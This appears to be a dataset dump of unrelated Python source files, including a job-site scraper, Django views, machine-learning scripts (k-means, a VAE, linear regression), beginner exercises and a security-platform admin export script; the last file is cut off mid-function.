text stringlengths 8 6.05M |
|---|
from string import split
from urllib import urlopen, quote
from BeautifulSoup import BeautifulSoup, NavigableString
from datetime import datetime, date
import scraperwiki
data = scraperwiki.sqlite.select('datetime()')
startedAt = data [ 0 ] [ 'datetime()' ]
scraperwiki.sqlite.execute("drop table if exists swdata")
scraperwiki.sqlite.commit()
URL_template = 'http://www.indeed.ca/jobs?q=title%3A%28counsellor%29&l=&radius=50&fromage=15'
titles = '''\
career consultant
career counsellor
career counselor
career coach
career development
career group
career resource
employment consultant
employment counsellor
employment counselor
employment rehabilitation
employment services
employment specialist
intake coordinator
job coach
job developer
job finding
job skills
language training
outplacement consultant
vocational program
vocational rehabilitation
vocational support'''
shortNames = [ 'NS', 'NB', 'NL', 'QC', 'BC', 'AB', 'SK', 'MB', 'ON', 'PE', 'YT', 'NU', 'NT', ]
titles = [ title . strip ( ) for title in split ( titles, '\n' ) ];
def getInnerText ( item ) :
result = ''
if type ( item ) is NavigableString :
return unicode ( item )
else :
try :
for content in item . contents :
result += ' %s' % getInnerText ( content )
except :
pass
return result
for title in titles :
URL = URL_template . replace ( 'counsellor', quote ( title ) )
while URL :
print URL
HTML = urlopen ( URL ) . read ( )
if HTML . find ( 'did not match any jobs' ) != -1 : break
soup = BeautifulSoup ( HTML )
jobTitles = soup . findAll ( 'h2', { 'class': 'jobtitle' } )
for jobTitle in jobTitles :
for attr in jobTitle . find ( 'a' ) . attrs :
if attr [ 0 ] == 'href' :
link = attr [ 1 ]
elif attr [ 0 ] == 'title' :
theJobTitle = attr [ 1 ] . strip ( )
link = '<a href="http://www.indeed.com%s">%s</a>' % ( link, theJobTitle, )
employer = getInnerText ( jobTitle . findNext ( 'span', { 'class': 'company' } ) )
location = getInnerText ( jobTitle . findNext ( 'span', { 'class': 'location' } ) )
jurisdiction = location [ -2 : ]
community = location [ : -4 ] . strip ( )
if not jurisdiction in shortNames :
break
record = {
'salary': '',
'jobTitle': theJobTitle,
'jurisdiction': jurisdiction,
'community': community,
'employer': employer,
'source': 'IN',
'link': link,
'startedAt': startedAt,
'conditions': '',
'deadline': '',
'dateposted': '',
}
scraperwiki.sqlite.save ( [ 'link' ], record )
URL = ''
possibleNexts = soup . findAll ( 'span', { 'class': 'np' } )
breakLoop = possibleNexts == [ ]
for possibleNext in possibleNexts :
breakLoop = getInnerText ( possibleNext ) . find ( 'Next' ) == -1
if not breakLoop :
nextLink = possibleNext . findParent ( 'a' )
for attr in nextLink . attrs :
if attr [ 0 ] == 'href' :
URL = 'http://www.indeed.com%s' % attr [ 1 ]
found = True
break
if breakLoop :
break
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class SpinnerBox(BoxLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class SpinnerApp(App):
def build(self):
return SpinnerBox()
if __name__ == '__main__':
SpinnerApp().run()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018 Phonexia
# Author: Jan Profant <jan.profant@phonexia.com>
# All Rights Reserved
import argparse
import pickle
import random
import logging
import os
import cv2
import openface
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def show_image(image):
import cv2
print(person)
cv2.namedWindow('image', cv2.WINDOW_NORMAL)
cv2.imshow('image', image)
if cv2.waitKey(0) == '32':
cv2.destroyAllWindows()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--input-dir', required=True,
help='path to the input directory in format Person1/image1.jpg, Person4/image3.jpg')
parser.add_argument('--face-predictor', help='path to dlib face predictor', required=False,
default=os.path.join('..', 'openface', 'models', 'dlib',
'shape_predictor_68_face_landmarks.dat'))
parser.add_argument('--img-dim', required=False, default=96)
args = parser.parse_args()
persons = os.listdir(args.input_dir)
random.shuffle(persons)
num_classes = len(persons)
align = openface.AlignDlib(args.face_predictor)
logger.info('Found {} persons in input directory `{}`.'.format(num_classes, args.input_dir))
for person in persons:
person_dir = os.path.join(args.input_dir, person)
pickle_file_path = os.path.join(args.input_dir, '{}.pkl'.format(person))
if not os.path.exists(pickle_file_path) and os.path.isdir(person_dir):
aligned_examples = []
for input_image in os.listdir(os.path.join(args.input_dir, person)):
input_image = os.path.join(args.input_dir, person, input_image)
image = cv2.imread(input_image)
# show_image(image)
bbs = align.getAllFaceBoundingBoxes(image)
if len(bbs) != 1:
logger.warning('Detected {} faces in image `{}`, expecting only 1.'.format(len(bbs), input_image))
boundary_box = None
else:
boundary_box = bbs[0]
aligned_face = align.align(args.img_dim, image, boundary_box,
landmarkIndices=openface.AlignDlib.OUTER_EYES_AND_NOSE)
if aligned_face is None:
logger.warning('Failed to align face in file `{}`.'.format(input_image))
continue
# show_image(aligned_face)
aligned_examples.append((aligned_face, person))
with open(pickle_file_path, 'wb') as f:
pickle.dump(aligned_examples, f, pickle.HIGHEST_PROTOCOL)
|
n = int(input("Digite um número inteiro para saber seu correspondente na seqüencia de Fibonacci: "))
a = 1
b = 1
count = 1
while n <= 0:
print('Não é possível utilizar um valor negativo.')
n = int(input('Digite um número inteiro para saber seu correspondente na sequüencia de Fibonacci: '))
while count <= (n - 1):
a, b = b, a + b
count += 1
print(a) |
num = int(input('Digite um número para ver sua tabuada: '))
print("""{} X 1 = {}
{} X 2 = {}
{} X 3 = {}
{} X 4 = {}
{} X 5 = {}
{} X 6 = {}
{} X 7 = {}
{} X 8 = {}
{} X 1 = {}
{} X 1 = {}""".format(num, num * 1, num, num * 2, num, num * 3, num, num * 4, num, num * 5, num, num * 6, num, num * 7, num, num * 8, num, num * 9, num, num * 10))
|
#!/usr/bin/python3
def uniq_add(my_list=[]):
s = 0
new = list(dict.fromkeys(my_list))
for i in new:
s += i
return s
|
## gfal 2.0 tools core parameters
## @author Adrien Devresse <adevress@cern.ch> CERN
## @license GPLv3
##
import sys
import gfal2
parameter_type_error="not a valid parameter type"
parameter_type_error="impossible to set parameter properly..."
def get_parameter_from_str_list(str_value_list):
str_value_tab = str_value_list.split(",")
return [ get_parameter_from_str(i) for i in str_value_tab]
def get_parameter_from_str(str_value):
def str2bool(v):
s= v.lower()
if(s in ["true", "yes", "y", "1"]): return True
if(s in ["false", "no", "n", "0"]): return False
raise ValueError("is not a boolean")
for i in [ int, str2bool, str ]:
try:
return i(str_value)
except ValueError:
pass
raise ValueError(parameter_type_error)
def parse_parameter(str_params):
group_sep = str_params.index(":");
res = str_params[:group_sep]
value_sep= str_params[group_sep+1:].index("=") + group_sep+1
return (res,str_params[group_sep+1:value_sep],
get_parameter_from_str_list(str_params[value_sep+1:]))
def set_gfal_tool_parameter(context, param_struct):
def set_params_struct(p, f):
f(param_struct[0], param_struct[1], param_struct[2][0])
if( len(param_struct[2]) > 1):
context.set_opt_string_list(param_struct[0], param_struct[1], param_struct[2])
elif( int == type(param_struct[2][0]) ):
set_params_struct(param_struct, context.set_opt_integer)
elif( bool ==type(param_struct[2][0]) ):
set_params_struct(param_struct, context.set_opt_boolean)
elif( str== type(param_struct[2][0]) ):
set_params_struct(param_struct, context.set_opt_string)
else:
raise ValueError(parameter_type_error)
def applys_option(context, params):
if(params.definition):
# print params.definition
p_list = [ parse_parameter(str_param[0]) for str_param in params.definition ]
# print p_list
[ set_gfal_tool_parameter(context, tuple_param) for tuple_param in p_list ]
|
import math
import random
def line(X, a, b):
return [a*x + b for x in X]
def sse(Y, Y_pred):
return sum([(y - y_pred) ** 2 for y, y_pred in zip(Y, Y_pred)])
def loss(Y, a, b, X):
return sse(Y, line(X, a, b))
def avg_loss(Y, a, b, X):
return math.sqrt(loss(Y, a, b, X) / len(X))
def average(X):
return sum(X) / len(X)
def update(Y, a, b, X, learning_rate):
Y_pred = line(X, a, b)
# print(a, b)
# print('(X, ypred)', list(zip(X, Y_pred)))
dydb = [2 * (y_pred - y) for y_pred, y in zip(Y_pred, Y)]
dyda = [x * d for x, d in zip(X, dydb)]
a -= learning_rate * average(dyda)
b -= learning_rate * average(dydb)
return a, b
if __name__ == '__main__':
n_samples = 30
a, b = 2, 2
learning_rate = 0.1
X = [random.random() for _ in range(n_samples)]
Y = line(X, a, b)
print(X)
print(Y)
a_guess, b_guess = -1., 1.
print('initial values: a = %d, b = %d' % (a_guess, b_guess))
for i in range(400):
a_guess, b_guess = update(Y, a_guess, b_guess, X, learning_rate)
print('step %d : a_guess = %.2f, b_guess = %.2f. Average loss : %.2f' % (i, a_guess, b_guess, avg_loss(Y, a_guess, b_guess, X)))
print(avg_loss(Y, a_guess, b_guess, X))
|
from django.shortcuts import render,redirect
from django.contrib.auth.models import User, auth
from django.contrib import messages
from .forms import UserRegistrationForm,UserUpdateForm,ProfileUpdateForm
from .models import Book
# Create your views here.
def register(request):
if request.method == 'POST':
form=UserRegistrationForm(request.POST)
if form.is_valid():
form.save()
username=form.cleaned_data.get('username')
messages.success(request, f'Your Account Has Been Created!! You Can Log In Now!! as {username}')
return redirect("login")
else:
form=UserRegistrationForm()
return render(request,'register.html',{'form': form})
def profile(request):
if request.method == 'POST':
u_form=UserUpdateForm(request.POST,instance=request.user)
p_form=ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your Account Has Been UPDAED!!')
return redirect('profile')
else:
u_form=UserUpdateForm(instance=request.user)
p_form=ProfileUpdateForm(instance=request.user.profile)
context ={
'u_form':u_form,
'p_form': p_form
}
return render(request,'profile.html',context)
def ecopies(request):
books = Book.objects.all()
return render(request,"e-copies.html",{'books': books })
|
from nltk import tokenize
import json
import itertools
from tensorflow.python.platform import gfile
import re
config = Choose_config.current_config['class']
# Special vocabulary symbols
_PAD = config._PAD
_GO = config._GO
_EOS = config._EOS
_UNK = config._UNK
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = config.PAD_ID
GO_ID = config.GO_ID
EOS_ID = config.EOS_ID
UNK_ID = config.UNK_ID
# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")
def load_article(raw_path, early_stop, batch_size):
'''
:param raw_path:
:param early_stop:
:param batch_size:
:return: yeild tokenized batch of articles
'''
article_index = 0
sample_file = open(raw_path)
if early_stop:
with open(raw_path) as f:
for next_n_lines in itertools.izip_longest(*[f] * batch_size):
articles = {"title": [], "content": []}
for line in next_n_lines:
if line:
json_data = json.loads(line.strip())
articles["title"].append(json_data['title'])
articles["content"].append(json_data['content'])
early_stop -= 1
if early_stop <= 0:
break
tok_articles = {'title': [" ".join(tokenize.sent_tokenize(c)) for c in articles['title']],
'content': [" ".join(tokenize.sent_tokenize(c)) for c in articles['content']]}
# print("len(tok_articles['content']", len(tok_articles['content']))
yield tok_articles
if early_stop <= 0:
break
else:
with open(raw_path) as f:
for next_n_lines in itertools.izip_longest(*[f] * batch_size):
articles = {"title": [], "content": []}
for line in next_n_lines:
if line:
json_data = json.loads(line.strip())
articles["title"].append(json_data['title'])
articles["content"].append(json_data['content'])
tok_articles = {'title': [" ".join(tokenize.sent_tokenize(c)) for c in articles['title']],
'content': [" ".join(tokenize.sent_tokenize(c)) for c in articles['content']]}
yield tok_articles
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(re.split(_WORD_SPLIT, space_separated_fragment))
return [w for w in words if w]
# Modified
def create_vocabulary(vocabulary_path, train_gen, val_gen, max_vocabulary_size,
tokenizer=None, normalize_digits=True):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
data_path: data file that will be used to create vocabulary.
max_vocabulary_size: limit on the size of the created vocabulary.
tokenizer: a function to use to tokenize each data sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
"""
# if not gfile.Exists(vocabulary_path):
# print("Creating vocabulary %s from data %s" % (vocabulary_path, data_path))
if not gfile.Exists(vocabulary_path):
print("Creating vocabulary %s from data %s" % (vocabulary_path, data_path))
vocab = {}
counter = 0
for article_batch in train_gen:
# build vocabulary
lst = article_batch['title'] + article_batch['content']
for line in lst:
counter += 1
if counter % 100000 == 0:
print(" processing line %d" % counter)
tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)
for w in tokens:
word = re.sub(_DIGIT_RE, b"0", w) if normalize_digits else w
if word in vocab:
vocab[word] += 1
else:
vocab[word] = 1
for article_batch in val_gen:
# build vocabulary
lst = article_batch['title'] + article_batch['content']
for line in lst:
counter += 1
if counter % 100000 == 0:
print(" processing line %d" % counter)
tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)
for w in tokens:
word = re.sub(_DIGIT_RE, b"0", w) if normalize_digits else w
if word in vocab:
vocab[word] += 1
else:
vocab[word] = 1
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)
if len(vocab_list) > max_vocabulary_size:
vocab_list = vocab_list[:max_vocabulary_size]
with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
for w in vocab_list:
vocab_file.write(w + b"\n")
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="rb") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError("Vocabulary file %s not found.", vocabulary_path)
def data_to_token_ids(gen, target_path, vocabulary_path,
tokenizer=None, normalize_digits=True):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
tokenizer: a function to use to tokenize each sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
"""
if not gfile.Exists(target_path):
print("Tokenizing data")
vocab, _ = initialize_vocabulary(vocabulary_path)
for article_batch in gen:
with gfile.GFile(target_path, mode="w") as tokens_file:
counter = 0
lst = article_batch['title'] + article_batch['content']
for line in lst:
counter += 1
if counter % 100000 == 0:
print(" tokenizing line %d" % counter)
token_ids = sentence_to_token_ids(line, vocab, tokenizer,
normalize_digits)
tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n")
def prepare_wmt_data(data_dir, en_vocabulary_size, fr_vocabulary_size, tokenizer=None):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
en_vocabulary_size: size of the English vocabulary to create and use.
fr_vocabulary_size: size of the French vocabulary to create and use.
tokenizer: a function to use to tokenize each data sentence;
if None, basic_tokenizer will be used.
Returns:
A tuple of 6 elements:
(1) path to the token-ids for English training data-set,
(2) path to the token-ids for French training data-set,
(3) path to the token-ids for English development data-set,
(4) path to the token-ids for French development data-set,
(5) path to the English vocabulary file,
(6) path to the French vocabulary file.
"""
# Get wmt data to the specified directory.
train_path = get_wmt_enfr_train_set(data_dir)
dev_path = get_wmt_enfr_dev_set(data_dir)
# Create vocabularies of the appropriate sizes.
fr_vocab_path = os.path.join(data_dir, "vocab%d.fr" % fr_vocabulary_size)
en_vocab_path = os.path.join(data_dir, "vocab%d.en" % en_vocabulary_size)
create_vocabulary(fr_vocab_path, train_path + ".fr", fr_vocabulary_size, tokenizer)
create_vocabulary(en_vocab_path, train_path + ".en", en_vocabulary_size, tokenizer)
# Create token ids for the training data.
fr_train_ids_path = train_path + (".ids%d.fr" % fr_vocabulary_size)
en_train_ids_path = train_path + (".ids%d.en" % en_vocabulary_size)
data_to_token_ids(train_path + ".fr", fr_train_ids_path, fr_vocab_path, tokenizer)
data_to_token_ids(train_path + ".en", en_train_ids_path, en_vocab_path, tokenizer)
# Create token ids for the development data.
fr_dev_ids_path = dev_path + (".ids%d.fr" % fr_vocabulary_size)
en_dev_ids_path = dev_path + (".ids%d.en" % en_vocabulary_size)
data_to_token_ids(dev_path + ".fr", fr_dev_ids_path, fr_vocab_path, tokenizer)
data_to_token_ids(dev_path + ".en", en_dev_ids_path, en_vocab_path, tokenizer)
return (en_train_ids_path, fr_train_ids_path,
en_dev_ids_path, fr_dev_ids_path,
en_vocab_path, fr_vocab_path) |
import os
# Base directory location
BASE_DIR = os.getcwd()
# File locations
MEAL_LOC = os.path.join("data", "meals.csv")
ITEM_LOC = os.path.join("data", "cupboard.csv")
PRICE_LOC = os.path.join("data", "prices.csv")
DATA_LOC = os.path.join("data", "data.txt") |
import random
list=["stone","paper","scissor"]
chances=5
no_of_chances=0
computer_score=0
player_score=0
print(" WELCOME TO STONE : PAPER : SCISSOR")
print(" CHOOSE ANY \tStone \tPaper \tscissor")
# STARTING OF WHILE LOOP
while no_of_chances<chances:
player_inp=input(" Stone : Paper : Scissor")
comp_inp=random.choice(list)
# CHECKING CONDITIONS
if player_inp == comp_inp:
print(" 0 : POINTS ASSIGNED TO EACH ")
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
elif player_inp == "stone" and comp_inp == "paper":
print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
print(" COMPUTER WINS 1 POINT")
computer_score+=1
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
elif player_inp == "stone" and comp_inp == "scissor":
print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
print("PLAYER WINS 1 POINT")
player_score+=1
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
elif player_inp == "paper" and comp_inp == "stone":
print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
print("PLAYER WINS 1 POINT")
player_score+=1
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
elif player_inp == "paper" and comp_inp == "scissor":
print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
print("COMPUTER WINS 1 POINT")
computer_score+=1
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
elif player_inp == "scissor" and comp_inp == "stone":
print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
print("COMPUTER WINS 1 POINT")
computer_score+=1
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
else:
print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
print("PLAYER WINS 1 POINT")
player_score+=1
print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
# END OF CHECKING CONDITIONS
no_of_chances+=1
print(f" CHANCE LEFT : {chances-no_of_chances}")
# END OF WHILE LOOP
print(" ----------------- GAME OVER -----------------")
if player_score>computer_score:
print(f"PLAYER WON ! POINTS : {player_score} , DIFFERENCE IN POINTS : {player_score-computer_score}")
elif computer_score>player_score:
print(f"COMPUTER WON! POINTS : {computer_score} , DIFFERENCE IN POINTS : {computer_score-player_score}")
else :
print(f"MATCH DRAW COMPUTER SCORE : {computer_score}, PLAYER SCORE : {player_score}")
|
# -*- coding: utf-8 -*-
__version__ = '0.1.1.dev'
__description__ = 'A Semantic UI theme for devpi'
|
# from zutils.utils import *
#
# if __name__ == '__main__':
# import numpy as np
# c1 = TaskRedis()
# c2 = TaskRedis('task2')
# s1 = TaskRedis()
# s2 = TaskRedis('task2')
#
# c1.set_task({'a': 1, 'b': np.zeros([1,1])})
# c2.set_task({'a': 1, 'b': np.zeros([2,2])})
#
#
# task = s2.get_task()
# task['c'] = task['b'].shape[0] * task['b'].shape[1]
# s2.set_task_result(task)
#
# task = s1.get_task()
# task['c'] = task['b'].shape[0] * task['b'].shape[1]
# s1.set_task_result(task)
#
#
#
#
#
# print(c1.get_task_result())
# print(c2.get_task_result())
|
# coding=utf-8
"""
题目一:和为s的两个数字
输入一个递增排序的数组和一个数字s,在数组中查找两个数,使得它们的和正好是s。如果有多对数字的数组的和等于s,输出任意一对
"""
class Solution(object):
def find_numbers_with_sum(self, nums, target):
left = 0
right = len(nums) - 1
while left < right:
two_sum = nums[left] + nums[right]
if two_sum == target:
return [nums[left], nums[right]]
elif two_sum > target:
right = right - 1
else:
left = left + 1
return []
"""
题目二:和为s的连续正数序列
"""
class Solution(object):
def find_continuous_sequence(self, target):
if target < 3:
return
begin = 1
end = 2
middle = (1 + target) / 2
current_sum = begin + end
result = []
while begin < middle:
if current_sum == target:
result.append([begin, end])
end += 1
current_sum += end
elif current_sum < target:
while end > begin and current_sum < target:
end += 1
current_sum += end
elif current_sum > target:
while begin < middle and current_sum > target:
current_sum -= begin
begin += 1
return result
print Solution().find_continuous_sequence(15)
|
# -*- coding: utf-8 -*-
from django.conf.urls import url, include, patterns
from rest_framework import routers
from app.api.v1.fleet.views import FleetView
from app.api.v1.customer.views import CustomerView
from app.api.v1.rentacar.views import RentACarView
from app.api.v1.rentacar.views import RentACarGiveBack
from app.api.v1.rentacar.views import RentACarRetrieveSerializer
router = routers.DefaultRouter(trailing_slash=False)
router.register(r'/frota', FleetView, base_name="fleet")
router.register(r'/cliente', CustomerView, base_name="customer")
router.register(r'/alugueis', RentACarRetrieveSerializer, base_name='rentacar')
router.register(r'/alugar', RentACarView, base_name="rentacar-create")
router.register(r'/devolver', RentACarGiveBack, base_name="rentacar-update")
fleet_detail = FleetView.as_view({
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy'
})
customer_detail = CustomerView.as_view({
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy'
})
rentacar_detail = RentACarGiveBack.as_view({
'put': 'update',
})
urlpatterns = patterns('',
url(r'^/frota/(?P<pk>[0-9]+)/$', fleet_detail, name='fleet-detail'),
url(r'^/cliente/(?P<pk>[0-9]+)/$', customer_detail, name='customer-detail'),
url(r'^/aluguel/(?P<pk>[0-9]+)/$', rentacar_detail, name='rentacar-detail'),
)
urlpatterns += router.urls
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 5 17:38:13 2021
@author: anand
"""
# Importing necessary libraries
import numpy as np
import pandas as pd
from sklearn import svm
import matplotlib.pyplot as plt
import seaborn as sns; sns.set(font_scale = 1.2)
import quantstats as qs
# Importing the data
dataset = pd.read_csv('cars.csv')
data = dataset.copy(deep = True)
# Extracting the data except brand
X = dataset[:-1]
# Checking for missing data
missing = dataset.isnull().sum()
## No missing values are found
# Converting to numeric data, Taking data excluding brand column
X = data[data.columns[:-1]]
X = X.apply(pd.to_numeric, errors = 'coerce').fillna(0).astype(int)
summary_X = X.describe()
# Using the Elbow method to find the optimal number of clusters
from sklearn.cluster import KMeans
wcss = []
for i in range(0, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', max_iter = 300, n_init = 10, random_state = 0)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
plt.plot(range(1,11), wcss)
plt.title('The Elbow Method')
plt.xlabel('Number of Clusters')
plt.ylabel('WCSS')
plt.show()
## We can take k as 3 from the plot
# Applying k-means to the cars dataset
kmeans = KMeans(n_clusters = 3, init = 'k-means++', max_iter = 300, n_init = 10, random_state = 0)
y_kmeans = kmeans.fit_predict(X)
X = X.as_matrix(columns = None)
## X is an array of data and y_kmeans is clusters 0, 1, 2
plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], size = 100, c = 'red', label = 'Toyota')
plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], size = 100, c = 'red', label = 'Nissan')
plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], size = 100, c = 'red', label = 'Honda')
plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')
plt.title('Clusters of car make')
plt.legend()
plt.show()
|
import json
import os
import sys
import warnings
import deepsecurity as api
from deepsecurity.rest import ApiException
from datetime import datetime
from pprint import pprint
def format_for_csv(line_item):
"""Converts a list into a string of comma-separated values, ending with a newline character.
:param line_item: The list of lists to convert to a string of comma-spearated values
:return: A string that can be saved as a CSV file.
"""
csv_line = ""
for num, item in enumerate(line_item):
csv_line += str(item)
if num != (len(line_item) - 1):
csv_line += ";"
else:
csv_line += "\n"
return csv_line
# Setup
if not sys.warnoptions:
warnings.simplefilter("ignore")
# Get the DSM URL and API key from a JSON file
property_file = os.path.dirname(os.path.abspath(__file__)) + '/../properties.json'
with open(property_file) as raw_properties:
properties = json.load(raw_properties)
secret_key = properties['secretkey']
url = properties['url']
api_version = 'v1'
# Add DSM host information to the API client configuration
configuration = api.Configuration()
configuration.host = url
configuration.api_key['api-secret-key'] = secret_key
# Initialization
# Set Any Required Values
api_instance = api.AdministratorsApi(api.ApiClient(configuration))
api_roles = api.AdministratorRolesApi(api.ApiClient(configuration))
# Add column titles to comma-separated values string
csv = "Username;Active;Last Sign in;Role\n"
try:
# list all roles and store role names in dictionary with id as key
roles = api_roles.list_administrator_roles(api_version)
roles_dict = {}
for role in roles.roles:
roles_dict[role.id] = role.name
# list all users on the system
admins = api_instance.list_administrators(api_version)
for admin in admins.administrators:
module_info = []
module_info.append(admin.username)
module_info.append(admin.active)
if admin.last_sign_in:
posix_time = int(admin.last_sign_in)/1000
last_sign_in = datetime.fromtimestamp(posix_time).isoformat()
else:
last_sign_in = None
module_info.append(last_sign_in)
module_info.append(roles_dict[admin.role_id])
# Add the module info to the CSV string
csv += format_for_csv(module_info)
with open("../outputoutput/users.csv", "w") as text_file:
text_file.write(csv)
except ApiException as e:
print("An exception occurred when calling Administratiors..list_administrators: %s\n" % e)
|
from User import User
import random
class Users:
database = ""
def __init__(self, database):
self.database = database
def users(self):
self.database.cursor.execute('''SELECT first_name, last_name, code FROM users''')
allrows = self.database.cursor.fetchall()
list_of_users = []
for row in allrows:
newUser = User()
newUser.init(row[0], row[1], row[2])
list_of_users.append(newUser)
return list_of_users
def usersearch_by_firstname(self, first_name):
userList = self.users()
users_with_firstname = []
for user in userList:
if user.first_name == first_name:
users_with_firstname.append(user)
return users_with_firstname
def usersearch_by_lastname(self, last_name):
userList = self.users()
users_with_lastname = []
for user in userList:
if user.last_name == last_name:
users_with_lastname.append(user)
return users_with_lastname
def usersearch_by_code(self, code):
userList = self.users()
for user in userList:
if user.code == code:
return user
return False
def add_user(self, first_name, last_name):
code = random.randint(1, 1000)
while self.usersearch_by_code(code) != False:
code = random.randint(1, 1000)
self.database.cursor.execute('''INSERT INTO users(first_name, last_name, code)
VALUES(?,?,?)''', (first_name, last_name, code))
self.database.db.commit()
def remove_user(self, user):
self.database.cursor.execute('''DELETE FROM users WHERE code = ? ''', (user.code,))
self.database.db.commit() |
#! /usr/bin/python
print "I want to buy a new better keyboard,but my wife won't agree with it."
|
import os
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from PIL import Image
from torch.utils.data import DataLoader, Dataset
from torchvision.datasets import MNIST
from torchvision.transforms import ToTensor
from squib.updaters.updater import StanderdUpdater
from squib.trainer.trainer import Trainer
latent_dim = 20
class Encoder(nn.Module):
def __init__(self):
super(Encoder, self).__init__()
self.mlp = nn.Sequential(
nn.Linear(784, 400),
nn.ReLU(inplace=True),
nn.Linear(400, latent_dim*2),
)
def forward(self, x):
x = x.reshape(-1, 784)
x = self.mlp(x)
mean, log_std = torch.chunk(x, chunks=2, dim=1)
return mean, log_std
class Decoder(nn.Module):
def __init__(self):
super(Decoder, self).__init__()
self.mlp = nn.Sequential(
nn.Linear(latent_dim, 400),
nn.ReLU(inplace=True),
nn.Linear(400, 784),
nn.Sigmoid(),
)
def forward(self, mean, log_std):
std = torch.exp(log_std)
eps = torch.randn_like(std)
x = mean + std*eps
x = self.mlp(x)
x = x.reshape(-1, 1, 28, 28)
return x
def VAEUpdater(encoder, decoder, optimizer=None, tag=None) -> StanderdUpdater:
bce = nn.BCELoss()
kld = lambda m, l: 0.5 * torch.mean(1 + 0.5*l - m.pow(2) - l.exp().pow(2))
def _loss_func(x, _):
if optimizer is None:
encoder.eval()
decoder.eval()
else:
encoder.train()
decoder.train()
mean, log_std = encoder(x)
y = decoder(mean, log_std)
loss_bce = bce(y, x.detach())
loss_kld = kld(mean, log_std)
loss = loss_bce - loss_kld
result = {
'bce':loss_bce.item(),
'kld':loss_kld.item(),
}
return loss, result
upd = StanderdUpdater(loss_func=_loss_func,
optimizer=optimizer,
tag =tag)
return upd
def example(encoder :Encoder,
decoder :Decoder,
validation_set:Dataset,
save_to :str,
device :torch.device):
n_img = 8
validation_imgs = torch.stack([validation_set[i][0] for i in range(n_img)])
if not os.path.exists(save_to):
os.mkdir(save_to)
def _func():
with torch.no_grad():
input_img = validation_imgs.to(device)
mean = torch.zeros((8, latent_dim), dtype=torch.float32, device=device)
std = torch.ones ((8, latent_dim), dtype=torch.float32, device=device)
reconstructed = decoder(*encoder(input_img))*255
generated = decoder(mean, std)*255
reconstructed = reconstructed.detach().cpu().numpy()
generated = generated .detach().cpu().numpy()
name = ['_reconstructed.png', '_generated.png']
